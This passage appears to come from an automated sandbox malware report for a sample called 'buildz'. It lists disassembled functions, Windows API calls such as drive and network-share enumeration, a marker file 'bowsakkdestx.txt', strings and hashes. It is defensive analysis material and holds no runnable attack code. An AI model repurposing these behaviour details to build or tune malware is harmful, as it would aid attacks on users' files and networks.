                          • _free.LIBCMT ref: 00425970
                            • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                            • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                          • __lock.LIBCMT ref: 00425989
                          • ___removelocaleref.LIBCMT ref: 00425998
                          • ___freetlocinfo.LIBCMT ref: 004259B1
                          • _free.LIBCMT ref: 004259C4
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                          • String ID:
                          • API String ID: 626533743-0
                          • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                          • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                          • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                          • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                          APIs
                          • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___from_strstr_to_strchr
                          • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                          • API String ID: 601868998-2416195885
                          • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                          • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                          • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                          • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: .\crypto\buffer\buffer.c$g9F
                          • API String ID: 2102423945-3653307630
                          • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                          • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                          • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                          • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                          APIs
                          • __getptd_noexit.LIBCMT ref: 004C5D3D
                            • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                            • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                            • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                            • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                            • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                          • __calloc_crt.LIBCMT ref: 004C5D60
                          • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                          • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                          Strings
                          • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                          • API String ID: 3123740607-798102604
                          • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                          • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                          • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                          • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _fprintf_memset
                          • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                          • API String ID: 3021507156-3399676524
                          • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                          • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                          • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                          • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                          • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Path$AppendFolder
                          • String ID: bowsakkdestx.txt
                          • API String ID: 29327785-2616962270
                          • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                          • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                          • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                          • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                          APIs
                          • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                          • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                          • UpdateWindow.USER32(00000000), ref: 0041BAC5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$CreateShowUpdate
                          • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                          • API String ID: 2944774295-3503800400
                          • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                          • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                          • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                          • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                          APIs
                          • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                          • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                          • _memset.LIBCMT ref: 00410C4C
                          • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Enum$AllocGlobalOpenResource_memset
                          • String ID:
                          • API String ID: 364255426-0
                          • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                          • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                          • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                          • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                          APIs
                          • __getenv_helper_nolock.LIBCMT ref: 00441726
                          • _strlen.LIBCMT ref: 00441734
                            • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                          • _strnlen.LIBCMT ref: 004417BF
                          • __lock.LIBCMT ref: 004417D0
                          • __getenv_helper_nolock.LIBCMT ref: 004417DB
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                          • String ID:
                          • API String ID: 2168648987-0
                          • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                          • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                          • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                          • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                          APIs
                          • GetLogicalDrives.KERNEL32 ref: 00410A75
                          • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                          • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                          • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                          • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                          • String ID:
                          • API String ID: 2560635915-0
                          • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                          • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                          • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                          • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                          APIs
                          • _malloc.LIBCMT ref: 0043B70B
                            • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                            • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                            • Part of subcall function 00420C62: HeapAlloc.KERNEL32(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                          • _free.LIBCMT ref: 0043B71E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocHeap_free_malloc
                          • String ID:
                          • API String ID: 2734353464-0
                          • Opcode ID: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
                          • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                          • Opcode Fuzzy Hash: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
                          • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                          APIs
                          • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                          • DispatchMessageW.USER32(?), ref: 0041F0B6
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                          • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                          • String ID:
                          • API String ID: 1380987712-0
                          • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                          • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                          • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                          • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                          APIs
                          • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                          • DispatchMessageW.USER32(?), ref: 0041E546
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                          • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                          • String ID:
                          • API String ID: 1380987712-0
                          • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                          • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                          • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                          • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                          APIs
                          • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                          • DispatchMessageW.USER32(?), ref: 0041FA7B
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                          • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                          • String ID:
                          • API String ID: 1380987712-0
                          • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                          • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                          • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                          • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                          APIs
                          • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                          • DispatchMessageW.USER32(?), ref: 0041FE2B
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                          • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                          • String ID:
                          • API String ID: 1380987712-0
                          • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                          • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                          • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                          • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 4104443479-4289949731
                          • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                          • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                          • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                          • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 4104443479-4289949731
                          • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                          • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                          • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                          • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcsnlen
                          • String ID: U
                          • API String ID: 3628947076-3372436214
                          • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                          • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                          • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                          • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: .\crypto\buffer\buffer.c$C7F
                          • API String ID: 2102423945-2013712220
                          • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                          • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                          • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                          • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                          APIs
                          Strings
                          • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: StringUuid$CreateFree
                          • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                          • API String ID: 3044360575-2335240114
                          • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                          • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                          • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                          • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                          • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Path$AppendFolder
                          • String ID: bowsakkdestx.txt
                          • API String ID: 29327785-2616962270
                          • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                          • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                          • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                          • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                          APIs
                          • _malloc.LIBCMT ref: 00423B64
                            • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                            • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                            • Part of subcall function 00420C62: HeapAlloc.KERNEL32(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                          • std::exception::exception.LIBCMT ref: 00423B82
                          • __CxxThrowException@8.LIBCMT ref: 00423B97
                            • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                          • String ID: bad allocation
                          • API String ID: 1059622496-2104205924
                          • Opcode ID: eeb942be7a8daecd01f402b1fc71538ff316d088b395842a07765e87b7e27695
                          • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                          • Opcode Fuzzy Hash: eeb942be7a8daecd01f402b1fc71538ff316d088b395842a07765e87b7e27695
                          • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                          APIs
                          • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
